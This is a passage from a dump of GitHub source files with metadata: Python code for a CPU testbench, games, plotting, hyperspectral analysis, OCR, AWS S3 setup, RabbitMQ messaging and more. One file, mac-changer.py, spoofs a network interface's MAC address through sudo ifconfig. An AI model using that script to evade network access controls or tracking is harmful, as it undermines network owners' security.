OutPort(10)\n\t\ts.memory_address = OutPort(10)\n\t\ts.outvale = OutPort(16)\n\t\ts.set_ports({\n\t\t\t'clock': s.clk,\n\t\t\t'reset': s.reset,\n\t\t\t'debug': s.debug,\n\t\t\t'inr': s.inr,\n\t\t\t'pc': s.pc,\n\t\t\t'memory_address': s.memory_address,\n\t\t\t'outvalue': s.outvalue\n\t\t\t})\n\n\tdef line_trace( s ):\n\t\treturn '{} {} {}'.format(s.pc,s.memory_address,s.outvalue)\n\n\nvector_header = ['reset debug inr pc* memory_address* outvalue*']\n\nexpected_pc = [0,1,2,3,4,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,5,6,7,8,9,10,11,12,13]\nexpected_load_address = [263,264,265,266,267,268]\nexpected_store_address = [269,270,271,272,273,274]\nexpected_outvalue = [6,8,9,10,11,12]\n\ndef gen_test_vector():\n\ttest_vector = []\n\tfor pc in expected_pc:\n\t\trow = [0,0,0,'?','?','?'];\n\t\tif pc == 7:\n\t\t\trow[4] = expected_load_address.pop(0)\n\t\tif pc == 10:\n\t\t\trow[4] = expected_store_address.pop(0)\n\t\t\trow[5] = expected_outvalue.pop(0)\n\t\ttest_vector.append(row)\n\treturn test_vector\n\ndef test_sample_program( dump_vcd ):\n\ttest_vector = copy.deepcopy(vector_header)\n\ttest_vector = test_vector + gen_test_vector()\n\trun_test_vector_sim(CPU_TOP(), test_vector, dump_vcd)\n\t\n","repo_name":"MattCatz/elec-5200","sub_path":"components/CPU_TOP/CPU_TOP_test.py","file_name":"CPU_TOP_test.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17638936638","text":"import dearpygui.dearpygui as dpg\nfrom datetime import datetime\nfrom common import state_continue, state_no_quote, state_stop_loss, state_stop_retrace, state_stop_hold, get_3_prices, \\\n should_sell\n\ndef save_callback():\n print(\"Save Clicked\")\n\ndpg.create_context()\ndpg.create_viewport()\ndpg.setup_dearpygui()\n\nstock = '1.600800'\nbuy_date = datetime(2022, 3, 18)\nbuy_price = 5.08\nmax_hold_days = 9\nhold_days, highest, lowest, lowest_aft_highest, = get_3_prices(stock, buy_date)\n\nwith dpg.window(label=\"Example Window\"):\n dpg.add_text(\"Hello world\")\n dpg.add_button(label=\"Save\", callback=save_callback)\n dpg.add_input_text(label=\"string\")\n dpg.add_slider_float(label=\"float\")\n\ndpg.show_viewport()\ndpg.start_dearpygui()\ndpg.destroy_context()","repo_name":"tinyboyz/sellreminder","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38930337634","text":"import pygame\r\nimport wall1\r\nimport dot\r\nimport node\r\nimport pacman\r\nimport ghosts\r\nimport random\r\n\r\n\r\nclass Map:\r\n def __init__(self, display_size, tile_size):\r\n '''\r\n Initializes a map object with attributes: map_file, display_size, tile_size, tile_list, wall_list, dot_list, big_dot_list, node_list.\r\n '''\r\n #self.map_file is a text file with a bunch of 1's and 0's based on what we want in that position.\r\n self.map_file = open('assets/map.txt', 'r')\r\n\r\n #self.display_size is the size of the display, this may not need to be used in this class\r\n self.display_size = display_size\r\n \r\n #self.tile_size is the size of the tile in pixels that we want. We can determine this\r\n #based on how big in pixels we want the map to be. The size\r\n #of the tiles are 15x15 and the size of the map is 28x36\r\n self.tile_size = tile_size\r\n\r\n def load_map(self):\r\n '''\r\n Reads a text file with directions on how to create the map.\r\n Loads in image files respectively.\r\n '''\r\n #this reads the file and creates a list of the certain sprites based on the letter.\r\n #self.tile_list looks something like -> [['1', '1', '1',...], ['1', '0', '0',...], [...], ...]\r\n self.tile_list = []\r\n for line in self.map_file:\r\n self.tile_list.append(list(line.rstrip()))\r\n self.map_file.close()\r\n\r\n #reads the self.tile_list, the 'row' variable is the index of the current list iteration,\r\n #the 'col' is index of each character in the current 'row'. This loops through each\r\n #tile in the 2D list and then creates a 'Wall' sprite in the correct spot.\r\n #it then returns each list so we can make it a sprite group and blit it to the screen.\r\n #list of walls\r\n self.wall_list = []\r\n #list of small dots\r\n self.dot_list = []\r\n #list of big dots\r\n self.big_dot_list=[]\r\n #list of nodes at each intersection\r\n self.node_list = []\r\n #list of ghosts\r\n self.ghost_list = []\r\n for row in range(len(self.tile_list)):\r\n for col in range(len(self.tile_list[row])):\r\n if self.tile_list[row][col] in ['h', 'v', 'w', 'x', 'y', 'z']:\r\n self.wall_list.append(wall1.Wall(col*self.tile_size, row*self.tile_size, 'normal-rect.png'))\r\n elif self.tile_list[row][col] == 'd':\r\n self.dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'dot.png', 'd'))\r\n elif self.tile_list[row][col] == 'D':\r\n self.big_dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'bigdot.png', 'D'))\r\n elif self.tile_list[row][col] == 'n':\r\n self.node_list.append(node.Node(col*self.tile_size, row*self.tile_size, 'red-square.png'))\r\n self.dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'dot.png', 'd'))\r\n elif self.tile_list[row][col] == 'P':\r\n self.pacman_x=col*self.tile_size\r\n self.pacman_y=row*self.tile_size\r\n self.pacman_tile = pacman.Pacman(col*self.tile_size, row*self.tile_size, \"pacman1.png\", 0)\r\n elif self.tile_list[row][col] == 'r':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'redghost.png', random.choice([0,2]), \"red\", 2))\r\n self.ghost_rx=col*self.tile_size\r\n self.ghost_ry=row*self.tile_size\r\n \r\n self.dot_list.append(dot.Dot(col*self.tile_size, row*self.tile_size, 'dot.png', 'd'))\r\n elif self.tile_list[row][col] == 'p':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'pinkghost.png', 1, \"pink\", 1))\r\n self.ghost_px=col*self.tile_size\r\n self.ghost_py=row*self.tile_size\r\n elif self.tile_list[row][col] == 'b':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'blueghost.png', 1, \"blue\", 1))\r\n self.ghost_bx=col*self.tile_size\r\n self.ghost_by=row*self.tile_size\r\n \r\n elif self.tile_list[row][col] == 'o':\r\n self.ghost_list.append(ghosts.Ghost(col*self.tile_size, row*self.tile_size, 'orange-ghost.png', 1, \"orange\", 1))\r\n self.ghost_ox=col*self.tile_size\r\n self.ghost_oy=row*self.tile_size\r\n elif self.tile_list[row][col] == 'g':\r\n self.wall_list.append(wall1.Wall(col*self.tile_size, row*self.tile_size, 'black-grey.png'))\r\n \r\n return self.wall_list, self.dot_list, self.node_list, self.big_dot_list, self.pacman_tile, self.ghost_list\r\n\r\n","repo_name":"theresagun/cs110FinalProject","sub_path":"maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9277848977","text":"from typing import List, Optional, Tuple, Union\nfrom matplotlib import pyplot as plt\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.axes import Axes\nimport torch\n\nfrom covpred.visualization.common import VisualizationImage, INCH_PER_PIXEL\n\n\ndef dense_covariance_images(imgs: VisualizationImage | List[VisualizationImage], **kwargs) -> Tuple[Figure, List[Axes]]:\n if isinstance(imgs, VisualizationImage):\n imgs = [imgs]\n\n default_figsize = (\n len(imgs) * INCH_PER_PIXEL * imgs[0].img.shape[1] + (len(imgs) - 1) * 10 * INCH_PER_PIXEL,\n INCH_PER_PIXEL * imgs[0].img.shape[0],\n )\n figsize = kwargs.get(\"figsize\", default_figsize)\n\n def create_img_viz(ax: Axes, img: torch.Tensor):\n # works because img is flipped\n ax.imshow(img.to(\"cpu\"))\n\n ax.set_xlim(0, img.shape[1])\n ax.set_ylim(img.shape[0], 0)\n\n fig, axs = plt.subplots(1, len(imgs), figsize=figsize)\n for img, ax in zip(imgs, axs):\n ax.axis(\"off\")\n create_img_viz(ax, img.img)\n\n plt.tight_layout()\n return fig, axs\n","repo_name":"DominikMuhle/dnls_covs","sub_path":"scripts/covpred/visualization/dense.py","file_name":"dense.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"24985095230","text":"import spectral\nimport spectral.io.envi as envi\nimport numpy as np\n\n\ndef get_wavelength(path_image):\n h = envi.read_envi_header(path_image)\n lambdas = (np.asarray(h[\"wavelength\"])).astype(np.float32)\n return lambdas\n\n\ndef read_cube(path_image):\n img = envi.open(path_image)\n arr = img.load()\n arr[arr < 0] = 0\n arr[arr > 1] = 1\n cube = np.zeros((np.shape(arr)[2], np.shape(arr)[0], np.shape(arr)[1]), dtype=np.float32)\n for i in range(np.shape(arr)[2]):\n tmp = np.reshape(arr[:, :, i], (np.shape(arr)[0], np.shape(arr)[1]))\n cube[i, :, :] = tmp\n\n return cube\n\n\ndef read_cropped_layer(path_image, x_start, y_start, x_end, y_end, layer):\n img = envi.open(path_image)\n cropped_layer = img[y_start:y_end, x_start:x_end, layer]\n cropped_layer = np.reshape(cropped_layer, (cropped_layer.shape[0], cropped_layer.shape[1]))\n cropped_layer[cropped_layer < 0] = 0\n cropped_layer[cropped_layer > 1] = 1\n return cropped_layer\n\n\ndef read_layer(path_image, layer):\n img = envi.open(path_image)\n layer = img.read_band(layer)\n layer[layer < 0] = 0\n layer[layer > 1] = 1\n return layer\n\n\ndef calculate_spectra_rectangle(path_image, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n spectra = list()\n n_band = np.shape(img)[2]\n for i in range(n_band):\n sub = img[y_start:y_end, x_start:x_end, i]\n sub = sub[sub <= 1]\n sub = sub[sub >= 0]\n val = np.mean(sub)\n spectra.append(val)\n\n spectra = np.asarray(spectra)\n spectra = np.reshape(spectra, (1, n_band))\n return spectra\n\n\ndef calculate_spectra_pixel(path_image, x_pix, y_pix):\n img = envi.open(path_image)\n n_band = np.shape(img)[2]\n spectra = img.read_pixel(y_pix, x_pix)\n spectra = np.reshape(spectra, (1, n_band))\n return spectra\n\n\ndef cluster(path_image, nb_cluster, nb_iteration, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n sub[sub < 0] = 0\n sub[sub > 1] = 1\n (m, c) = spectral.kmeans(sub, nb_cluster, nb_iteration)\n return (m, c)\n\n\ndef cluster_pca(path_image, nb_cluster, nb_iteration, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n sub[sub < 0] = 0\n sub[sub > 1] = 1\n pc = spectral.principal_components(sub)\n pc_0999 = pc.reduce(fraction=0.999)\n sub_pc = pc_0999.transform(sub)\n sub_pc_real = sub_pc.real\n (m, c) = spectral.kmeans(sub_pc_real, nb_cluster, nb_iteration)\n return (m, c)\n\n\ndef calculate_spectral_angles(path_image, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n ref_spectra = calculate_spectra_rectangle(path_image, x_start, y_start, x_end, y_end)\n spectral_angles = spectral.spectral_angles(sub, ref_spectra)\n return np.reshape(spectral_angles, (np.shape(spectral_angles)[0], np.shape(spectral_angles)[1]))\n\n\ndef calculate_spectral_map(path_image, x_start, y_start, x_end, y_end):\n img = envi.open(path_image)\n sub = img.read_subregion((y_start, y_end), (x_start, x_end))\n sub[sub < 0] = 0\n sub[sub > 1] = 1\n pc = spectral.principal_components(sub)\n pc_0999 = pc.reduce(fraction=0.999)\n sub = pc_0999.transform(sub)\n sub = sub.real\n spectral_map = np.zeros((np.shape(sub)[0], np.shape(sub)[1]))\n for y in range(1, np.shape(sub)[0]-1):\n for x in range(1, np.shape(sub)[1]-1):\n new_spectra = np.reshape(sub[y, x, :], (1, 1, np.shape(sub)[2]))\n tmp = [\n\t\t\tabs(spectral.spectral_angles(new_spectra, np.reshape(sub[y-1, x-1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y-1, x, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y-1, x+1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y, x-1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y, x+1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y+1, x-1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y+1, x, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y+1, x+1,:], (1, np.shape(sub)[2]))))]\n\n spectral_map[y, x] = np.mean(tmp)\n\n return spectral_map\n\n\n# path = 'C:/Users/swift/Desktop/Data/test/SkinAbs G927691_corrected.hdr'\n# sa = calculate_spectral_angles(path, 300, 150, 800, 200)\n# map = calculate_spectral_angles2(path, 300, 150, 800, 200)\n# print(map)\n","repo_name":"JulietteV/hsi","sub_path":"python/spectral_library.py","file_name":"spectral_library.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36396172067","text":"import copy\nimport json\nimport re\nfrom dataclasses import dataclass, field\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom typing import List\n\nimport zhconv\n\nfrom ..baidu_ocr import ocr_text\nfrom ..player_info.query import get_uid_by_qid\nfrom ..util import cache, get_config, get_path, gh_json, init_db, process\nfrom .collect_sheet import remove_special_char, achievements_sheet\nfrom .proxy_url import proxy_url\n\nconfig = get_config()\ndb = init_db(config.cache_dir, 'achievement.sqlite')\nlocal_dir = Path(get_path('achievement'))\n\nwith open(local_dir / 'fix_word.json', 'r', encoding=\"utf-8\") as fp:\n FIX_WORD = json.load(fp)\n\n\n@cache(ttl=timedelta(hours=24))\nasync def gh_fix_word():\n return await gh_json('achievement/fix_word.json')\n\n\n@dataclass\nclass Info:\n uid: int = 0\n completed: List[str] = field(default_factory=list)\n\n\nWORD_REPLACE = {}\n\n\nclass achievement:\n qq: int\n info: Info\n\n def __init__(self, qq):\n self.qq = str(qq)\n\n if process(self.qq).is_run():\n raise Exception('正在处理中...')\n uid = get_uid_by_qid(self.qq)\n if not uid:\n raise Exception('请先使用查询游戏UID功能进行绑定')\n\n info = db.get(self.qq, {}).get(uid)\n\n self.info = info and Info(**info) or Info(uid=uid)\n\n self.run = process(self.info.uid).start()\n\n async def save_data(self, data):\n if not db.get(self.qq):\n db[self.qq] = {self.info.uid: data}\n else:\n new_data = db[self.qq]\n new_data[self.info.uid] = data\n db[self.qq] = new_data\n\n async def clear_data(self):\n await self.save_data({})\n\n async def form_img_list(self, img_list):\n try:\n all_achievement = await achievements_sheet()\n all_keys = all_achievement.keys()\n completed = set(self.info.completed)\n old_completed_len = len(completed)\n ocr_success = []\n for img_url in img_list:\n result = await ocr_text(img_url=img_url)\n ocr_count = 0\n for word in result.words_result:\n word = word.words.strip()\n word = zhconv.convert(word, 'zh-hans').strip('“”') # 转换简体字\n local_fix = FIX_WORD.get(word)\n\n if not local_fix: # 如果本地没有修复的词, 就使用github上的\n gh_fix = await gh_fix_word()\n word = gh_fix.get(word, word)\n else:\n word = local_fix\n\n word = remove_special_char(word)\n\n if len(word) == 1:\n continue\n\n if word == '达成':\n continue\n\n match_count = re.search(r'^\\d+/\\d+$', word)\n match_date = re.search(r'^\\d+/\\d+/\\d+$', word)\n if match_count or match_date:\n continue\n\n for v in WORD_REPLACE.items():\n word = word.replace(*v)\n\n word_filter = list(filter(lambda s: word in s, all_keys))\n if word_filter:\n ocr_count += 1\n completed.add(all_achievement[word_filter[0]].name)\n ocr_success.append(ocr_count)\n self.info.completed = list(completed)\n\n await self.save_data(self.info.__dict__)\n\n self.run.ok()\n return ocr_success, len(self.info.completed) - old_completed_len\n except Exception as e:\n self.run.ok()\n raise e\n\n async def from_proxy_url(self, url_list):\n try:\n img_list, failed_list = await proxy_url(url_list)\n ocr_success, added_len = await self.form_img_list(img_list)\n return failed_list, ocr_success, added_len\n except Exception as e:\n self.run.ok()\n raise e\n\n @property\n async def unfinished(self):\n try:\n all_achievement = copy.copy(await achievements_sheet())\n all_keys = all_achievement.keys()\n\n for name in self.info.completed:\n name = remove_special_char(name)\n if name in all_keys:\n del all_achievement[name]\n self.run.ok()\n return all_achievement.values()\n except Exception as e:\n self.run.ok()\n raise e\n","repo_name":"pcrbot/erinilis-modules","sub_path":"egenshin/achievement/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"53"} +{"seq_id":"9888328297","text":"\"\"\"add columns start_time and end_time.\n\nRevision ID: f4eed4c26e2c\nRevises: 42add02bf976\nCreate Date: 2021-12-20 13:18:31.122983\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\nfrom sqlalchemy import inspect\n\n# revision identifiers, used by Alembic.\nrevision = \"f4eed4c26e2c\"\ndown_revision = \"42add02bf976\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n inspector = inspect(op.get_bind())\n has_tables = inspector.get_table_names()\n\n if \"runs\" in has_tables:\n columns = [x.get(\"name\") for x in inspector.get_columns(\"runs\")]\n with op.batch_alter_table(\"runs\") as batch_op:\n if \"start_time\" not in columns:\n batch_op.add_column(sa.Column(\"start_time\", sa.Float))\n if \"end_time\" not in columns:\n batch_op.add_column(sa.Column(\"end_time\", sa.Float))\n\n\ndef downgrade():\n inspector = inspect(op.get_bind())\n has_tables = inspector.get_table_names()\n if \"runs\" in has_tables:\n columns = [x.get(\"name\") for x in inspector.get_columns(\"runs\")]\n\n with op.batch_alter_table(\"runs\") as batch_op:\n if \"start_time\" in columns:\n batch_op.drop_column(\"start_time\")\n if \"end_time\" in columns:\n batch_op.drop_column(\"end_time\")\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/storage/alembic/versions/024_add_columns_start_time_and_end_time_sqlite.py","file_name":"024_add_columns_start_time_and_end_time_sqlite.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16571041538","text":"import curses\nimport os\n\n\ndef go_back(stdstr):\n stdstr.clear()\n str1 = os.getcwd()\n current_dir = str1.split('/')\n current_dir.pop()\n separator = '/'\n directory = separator.join(current_dir)\n stdstr.refresh()\n \ncwd = os.getcwd()\nprint((cwd))\n# print(\"Path at terminal when executing this file\")\n# print(os.getcwd() + \"\\n\")\n#\n# print(\"This file path, relative to os.getcwd()\")\n# print(__file__ + \"\\n\")\n#\n# print(\"This file full path (following symlinks)\")\n# full_path = os.path.realpath(__file__)\n# print(full_path + \"\\n\")\n#\n# print(\"This file directory and name\")\n# path, filename = os.path.split(full_path)\n# print(path + ' --> ' + filename + \"\\n\")\n#\n# print(\"This file directory only\")\n# print(os.path.dirname(full_path))\n\n\ndef print_dir(stdscr, selected_row_idx):\n stdscr.clear()\n list_dir = os.listdir()\n cwd = os.getcwd()\n h, w = stdscr.getmaxyx()\n\n stdscr.addstr(0, 0, cwd)\n for idx, row in enumerate(list_dir):\n y = len(list_dir)//2 + idx\n x = 5\n if idx == selected_row_idx:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, row)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.addstr(y, x, row)\n\n stdscr.refresh()\n\n\ndef main(stdscr):\n curses.curs_set(0)\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\n current_row_idx = 0\n\n print_dir(stdscr, current_row_idx)\n\n while 1:\n key = stdscr.getch()\n\n stdscr.clear()\n\n if key == curses.KEY_UP and current_row_idx > 0:\n current_row_idx -= 1\n elif key == curses.KEY_UP and current_row_idx == 0:\n current_row_idx = len(list_dir) - 1\n elif key == curses.KEY_DOWN and current_row_idx < len(list_dir) - 1:\n current_row_idx += 1\n elif key == curses.KEY_DOWN and current_row_idx == len(list_dir) - 1:\n current_row_idx = 0\n elif key == curses.KEY_ENTER or key in [10, 13]:\n go_back()\n # stdscr.getch()\n\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n","repo_name":"Jspriddy/Pycharm-projects","sub_path":"curses/os/file_explorer.py","file_name":"file_explorer.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73522009767","text":"import aws_cdk as cdk\nimport aws_cdk.aws_s3 as s3\nimport aws_cdk.aws_iam as iam\nfrom .customized_parameters import (\n deployment_id,\n s3_retention_period,\n bucket_name_suffix,\n)\nfrom constructs import Construct\nfrom aws_cdk import (\n RemovalPolicy,\n Duration,\n)\n\n\ndef get_all_s3_buckets(scope: Construct):\n \"\"\"\n\n :param scope:\n :return:\n \"\"\"\n buckets = []\n bucket_names = [\n \"apisec\", \"audit\", \"configuration\", \"engine-logs\", \"imports\", \"kics-metadata\", \"kics-worker\", \"logs\",\n \"misc\", \"queries\", \"redis-shared-bucket\", \"report-templates\", \"reports\", \"repostore\", \"sast-metadata\",\n \"sast-worker\", \"sca-worker\", \"scan-results-storage\", \"scans\", \"source-resolver\", \"uploads\"\n ]\n\n for index, name in enumerate(bucket_names):\n bucket = s3.Bucket(\n scope=scope,\n id=\"-\".join([\"bucket\", str(index)]),\n access_control=s3.BucketAccessControl.PRIVATE,\n auto_delete_objects=True,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n bucket_name=\"-\".join([name, bucket_name_suffix]),\n encryption=s3.BucketEncryption.S3_MANAGED,\n enforce_ssl=True,\n versioned=False,\n lifecycle_rules=[\n s3.LifecycleRule(\n enabled=True,\n id=\"Transition-To-Intelligent-Tiering\",\n transitions=[\n s3.Transition(\n storage_class=s3.StorageClass.INTELLIGENT_TIERING,\n transition_after=Duration.days(0)\n ),\n ]\n ),\n s3.LifecycleRule(\n id=\"-\".join([str(s3_retention_period), \"Days-Non-Current-Expiration\"]),\n enabled=True,\n abort_incomplete_multipart_upload_after=Duration.days(1),\n noncurrent_version_expiration=Duration.days(s3_retention_period),\n expired_object_delete_marker=True,\n )\n ],\n object_ownership=s3.ObjectOwnership.BUCKET_OWNER_PREFERRED,\n removal_policy=RemovalPolicy.DESTROY,\n )\n bucket.add_to_resource_policy(iam.PolicyStatement(\n sid=\"denyInsecureTransport\",\n effect=iam.Effect.DENY,\n principals=[iam.AnyPrincipal()],\n actions=[\"s3:*\"],\n resources=[bucket.bucket_arn, bucket.arn_for_objects('*')],\n conditions={\n \"Bool\": {\n \"aws:SecureTransport\": \"false\"\n }\n }\n ))\n cdk.Tag(key=\"Name\", value=f\"{deployment_id} {name} bucket\").visit(bucket)\n cdk.Tag(key=\"Environment\", value=f\"{deployment_id}\").visit(bucket)\n buckets.append(bucket)\n return buckets\n","repo_name":"HappyY19/cxone-cloudformation","sub_path":"cxone_cloudformation/s3_buckets.py","file_name":"s3_buckets.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23727235047","text":"\nimport time\nimport pika\npath = 'F:\\office2\\mcxSender\\MCX_20170829 - Copy.rt'\ninfile = open(path,'r')\n\n#queue\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='hello')\n\nwhile True:\n for line in infile.readlines():\n try:\n split = line.split(',')\n if len(split)>1:#if condition is used so that the we dont split the blank line.\n client = split[19].strip() \n #if 'M04223' == client: \n tradeno = split[0].strip()\n comdty = split[4].strip()\n #date1 = split[5].strip()\n side = 'SELL'\n if split[15].strip() == '1':\n side = 'BUY' \n qty = split[16].strip() \n price = split[17].strip() \n expiry = split[5].strip()\n tradetime = split[24].strip()\n msg = tradetime + \"-\"+ tradeno + \"-\"+client + \"-\" + comdty +'-' +expiry+\"-\" + side + '-' + qty + '-' +price \n localtime = time.localtime(time.time()) \n print(\"msg routed :\" + msg)\n channel.basic_publish(exchange='',\n routing_key='hello',\n body=msg)\n except IndexError:\n pass \n time.sleep(0.50)\n \nprint('end of while reached')\nconnection.close() #closing rabbitmq connection \nprint('rabbitmq connection closed')\n\n \n","repo_name":"outboxsol/15Sep2017","sub_path":"mcxSender/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42191957261","text":"#!/usr/bin/env python3\n\nimport subprocess\n\nfrom optparse import OptionParser\n\nimport re\n\n\ndef get_arguments():\n parser = OptionParser()\n parser.add_option(\"-i\", \"--interface\", dest=\"interface\",\n help=\"The name of the interface or network adapter you are looking to manipulate.\\n\"\n \"Default mac will be set to 00:11:22:33:44:55 (if no mac-address is specified).\"\n , metavar=\"argument\")\n parser.add_option(\"-m\", \"--mac\", dest=\"new_mac\",\n help=\"Specify 'new' mac-address you would like to set, You MUST specify an interface beforehand.\"\n , metavar=\"argument\")\n\n (options, arguments) = parser.parse_args()\n\n if not options.interface:\n # no error\n parser.error(\"[-] Please specify an interface, use --help for more info.\")\n elif not options.new_mac:\n # no error\n parser.error(\"[-] Please specify a mac address, use --help for more info.\")\n return options\n\n\ndef change_mac(interface, new_mac):\n if new_mac:\n print(\"\\n[+] Changing MAC for interface: \" + interface + \" to \" + new_mac + \"\\n\")\n subprocess.run([\"sudo\", \"ifconfig\", interface, \"down\"])\n subprocess.run([\"sudo\", \"ifconfig\", interface, \"hw\", \"ether\", new_mac])\n subprocess.run([\"sudo\", \"ifconfig\", interface, \"up\"])\n # subprocess.run([\"sudo\", \"ifconfig\", interface])\n\n\ndef get_mac(interface):\n ifconfig_result = subprocess.check_output([\"ifconfig\", interface])\n ifconfig_search = str(ifconfig_result)\n search_output = re.search(\"\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w\", ifconfig_search)\n\n if search_output:\n return search_output.group(0)\n else:\n print(\"[-] Could not read MAC Address.\")\n\n# Getting user inputs\n\n\noptions = get_arguments()\ncurrent_mac = get_mac(options.interface)\nprint(\"\\n[*] Current MAC is: \" + str(current_mac))\n\n# Changing the mac address\nchange_mac(options.interface, options.new_mac)\n\n# Displaying output for user\ncurrent_mac = get_mac(options.interface)\nif current_mac == options.new_mac:\n print(\"[+] MAC address has been changed to :\" + current_mac)\nelse:\n print(\"[-] MAC address did not change.\")\n\n","repo_name":"XGKCode/Henrique","sub_path":"mac-changer.py","file_name":"mac-changer.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888883367","text":"from pathlib import Path\nfrom subprocess import check_output, CalledProcessError\nfrom typing import List, Union\n\nimport numpy as np\n\n\nclass SpikeSortingError(RuntimeError):\n \"\"\"Raised whenever spike sorting fails\"\"\"\n\n\ndef get_bash_path():\n \"\"\"Return path to existing bash install.\"\"\"\n try:\n return check_output([\"which bash\"], shell=True).decode().strip(\"\\n\")\n except CalledProcessError as e:\n raise Exception(\"Bash is not installed or accessible on your system.\")\n\n\ndef get_matlab_shell_name():\n \"\"\"Return name of shell program used by MATLAB.\n\n As per MATLAB docs:\n 'On UNIX, MATLAB uses a shell program to execute the given command. It\n determines which shell program to use by checking environment variables on\n your system. MATLAB first checks the MATLAB_SHELL variable, and if either\n empty or not defined, then checks SHELL. If SHELL is also empty or not\n defined, MATLAB uses /bin/sh'\n \"\"\"\n try:\n # Either of \"\", \"bash\", \"zsh\", \"fish\",...\n # CalledProcessError if not defined\n matlab_shell_name = check_output([\"which $MATLAB_SHELL\"], shell=True).decode().strip(\"\\n\").split(\"/\")[-1]\n return matlab_shell_name\n except CalledProcessError as e:\n pass\n try:\n # Either of \"\", \"bash\", \"zsh\", \"fish\",...\n # CalledProcessError if not defined\n df_shell_name = check_output([\"which $SHELL\"], shell=True).decode().strip(\"\\n\").split(\"/\")[-1]\n return df_shell_name\n except CalledProcessError as e:\n pass\n return \"sh\"\n\n\ndef get_git_commit(git_folder, shorten=True):\n \"\"\"\n Get commit to generate sorters version.\n \"\"\"\n if git_folder is None:\n return None\n try:\n commit = check_output([\"git\", \"rev-parse\", \"HEAD\"], cwd=git_folder).decode(\"utf8\").strip()\n if shorten:\n commit = commit[:12]\n except:\n commit = None\n return commit\n\n\ndef has_nvidia():\n \"\"\"\n Checks if the machine has nvidia capability.\n \"\"\"\n\n try:\n from cuda import cuda\n except ModuleNotFoundError as err:\n raise Exception(\n \"This sorter requires cuda, but the package 'cuda-python' is not installed. You can install it with:\\npip install cuda-python\"\n ) from err\n\n try:\n (cu_result_init,) = cuda.cuInit(0)\n cu_result, cu_string = cuda.cuGetErrorString(cu_result_init)\n cu_result_device_count, device_count = cuda.cuDeviceGetCount()\n return device_count > 0\n except RuntimeError: # Failed to dlopen libcuda.so\n return False\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/sorters/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"4831841152","text":"import pytest\n\nfrom edne_correios_loader.table_set import (\n TableSetEnum,\n get_cep_tables,\n get_table_files_glob,\n)\n\n\ndef test_get_cep_tables():\n assert get_cep_tables() == [\n 